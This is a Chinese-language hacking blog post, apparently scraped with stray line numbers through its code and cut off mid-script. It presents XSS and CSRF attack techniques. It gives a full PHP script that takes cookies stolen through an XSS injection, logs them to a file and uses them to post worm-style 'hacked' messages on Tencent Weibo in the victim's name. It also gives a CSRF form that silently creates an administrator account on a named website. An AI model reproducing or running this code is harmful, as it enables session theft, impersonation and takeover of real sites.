朋友做了一件搞笑的事:挖了一个站的Csrf 0day,硬是带人家站加了友情链接。

 如今仍很多人没有意识到XSS的威力,他们会说,不就弹个窗么。那好吧,就弹个窗。

 Web2.0时代将是XSS的时代,各种XSS引发的淫荡招数将会越来越多,层出不穷,不信走着瞧。

例1 (php之术)

发视频处插如下代码

http://www.tudou.com/programs/view/TLpmMpTY0eY/">  //读cookie转到php里,没啥好讲的

0kee.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:

 

   
   
   
   
    
    
    
    
    
    2. 
    
    
    
    
  2. ob_start(); 
    3. 
    
    
    
    
  3. $url = 't.qq.com'
    4. 
    
    
    
    
  4. $cookie=$_GET['cookie']; 
    5. 
    
    
    
    
  5. $randnum=rand();//这边的随机数我不知道有何用,我还特地去用腾讯微博抓包了下发现没这项,然后viewmode=0,不过这与主题无关 
    6. 
    
    
    
    
  6. $cookie1=$cookie."\r\n\r\n"
    7. 
    
    
    
    
  7. fputs(fopen('a.txt','a+'),$cookie1); //写到a.txt里,,留个纪念 
    8. 
    
    
    
    
  8. $sock = fsockopen("$url", 80, $errno$errstr, 30); 
    9. 
    
    
    
    
  9. if (!$sockdie("$errstr ($errno)\n"); 
    10. 
    
    
    
    
  10. $data = "content=http://url.cn/1FDpEd hacked!! xss worm test~~".$randnum."&pic=&countType=&viewModel=1"
    11. 
    
    
    
    
  11. fwrite($sock"POST http://$url/publish.php HTTP/1.1\r\n"); //这个publish.php是腾讯的发微博的php 
    12. 
    
    
    
    
  12. fwrite($sock"Accept: */*\r\n"); 
    13. 
    
    
    
    
  13. fwrite($sock"Referer: http://0kee.com\r\n"); 
    14. 
    
    
    
    
  14. fwrite($sock"Accept-Language: zh-cn\r\n"); 
    15. 
    
    
    
    
  15. fwrite($sock"Content-Type: application/x-www-form-urlencoded\r\n"); 
    16. 
    
    
    
    
  16. fwrite($sock"Accept-Encoding: gzip, deflate\r\n"); //客户端浏览器(我的是IE8),提交包头里会有用gzip压缩 
    17. 
    
    
    
    
  17. fwrite($sock"User-Agent: Mozilla\r\n"); 
    18. 
    
    
    
    
  18. fwrite($sock"Host: $url\r\n"); 
    19. 
    
    
    
    
  19. fwrite($sock"Content-Length: ".strlen($data)."\r\n"); 
    20. 
    
    
    
    
  20. fwrite($sock"Connection: Keep-Alive\r\n"); 
    21. 
    
    
    
    
  21. fwrite($sock"Cache-Control: no-cache\r\n"); 
    22. 
    
    
    
    
  22. fwrite($sock"Cookie:".$cookie."\r\n\r\n"); 
    23. 
    
    
    
    
  23. fwrite($sock$data); //上头php代码都是post发数据的老一套 
    24. 
    
    
    
    
  24. $headers = ""
    25. 
    
    
    
    
  25. while ($str = trim(fgets($sock, 4096))) 
    26. 
    
    
    
    
  26.      $headers .= "$str\n"
    27. 
    
    
    
    
  27. echo "\n"
    28. 
    
    
    
    
  28. $body = ""
    29. 
    
    
    
    
  29. while (!feof($sock)) 
    30. 
    
    
    
    
  30.      $body .= fgets($sock, 4096); 
    31. 
    
    
    
    
  31. fclose($sock); 
    32. 
    
    
    
    
  32. Header("Location: http://t.qq.com/txsser");  //作者装x了,唉 
    33. 
    
    
    
    
  33. ob_end_flush(); 
    34. 
    
    
    
    
  34. ?> 
    35.

记得以前校内就有过类似事件,QQ最起码应该晓得过滤<>啊..晕

另一个例子(加管理员之术):

首先拥有一个自己可控的网站,然后构造表单:

 

   
   
   
   
    
    
    
    
    
  1. <html> 
    2. 
    
    
    
    
  2. <form method="post" action="http://www.stuhack.com/admin/Admin_Admin.asp?" name="form1"> 
    3. 
    
    
    
    
  3. <input name="UserName" value="test">     
    4. 
    
    
    
    
  4. <input name="Action" type="hidden" id="Action" value="SaveAdd"> 
    5. 
    
    
    
    
  5. <input name="AddUser" value="test">     
    6. 
    
    
    
    
  6. <input type="password" name="Password" value="123456789">     
    7. 
    
    
    
    
  7. <input type="password" name="PwdConfirm" value="123456789">  
    8. 
    
    
    
    
  8. <input name="Purview_0" type="radio" value="1" onClick="PurviewDetail.style.display='none'" checked>  
    9. 
    
    
    
    
  9. form> 
    10. 
    
    
    
    
  10. <mce:script type="text/javascript">